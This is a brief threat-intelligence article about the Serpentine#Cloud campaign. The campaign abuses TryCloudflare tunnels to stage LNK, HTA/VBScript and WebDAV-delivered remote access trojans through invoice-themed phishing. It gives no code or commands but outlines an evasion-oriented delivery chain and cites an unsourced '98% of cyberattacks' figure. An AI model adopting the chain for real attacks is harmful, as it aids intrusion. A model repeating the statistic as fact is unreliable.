As cybercriminals increasingly turn to sophisticated tactics, the exploitation of Cloudflare‘s free TryCloudflare Tunnel feature has emerged as a significant threat. This method allows malicious actors to gain unauthorized access by sending phishing emails disguised as legitimate invoices or tax documents. These emails often contain attachments with low-risk file types, such as “application/windows-library+xml,” designed to bypass email security filters. Detection rules have been implemented to combat these tactics, but their effectiveness is continually challenged.
The cybercriminals initiate payload execution through deceptive LNK files that trigger HTML Applications (HTA) utilizing VBScript. By establishing connections to WebDAV resources hosted in Cloudflare’s infrastructure, attackers can deploy multi-stage payloads, primarily targeting Remote Access Trojans (RATs). Notable examples of these RATs include AsyncRAT, GuLoader, and Remcos. The malicious software can operate through in-memory execution, thereby evading persistent detection. This campaign has been dubbed Serpentine#Cloud due to its active and ongoing nature.
Organizations in manufacturing, technology, finance, and legal sectors frequently find themselves on the wrong end of these attacks. The targeting of these high-value sectors suggests a clear financial motivation, as these industries rely heavily on the timely processing of invoices and tax-related documents. Cybercriminals have reportedly sent over 1,500 phishing messages across various industries, ensuring that they capitalize on any opportunities to release their attacks. With social engineering tricks contributing to 98% of cyberattacks, these phishing campaigns prove particularly effective at compromising organizational security.
However, the use of Cloudflare tunnel subdomains provides attackers with a veneer of legitimacy, complicating detection efforts. Obfuscated scripts, such as BAT and PowerShell, are utilized to hide malicious actions, making traditional signature-based detection systems less effective. As sophisticated evasion techniques develop, Cloudflare’s machine learning-based detection capabilities struggle to keep pace with the evolving environment of cyber threats.
Since the initial observations of these tactics in February 2024, the campaigns have continued, demonstrating a troubling persistence and adaptability among malicious actors.
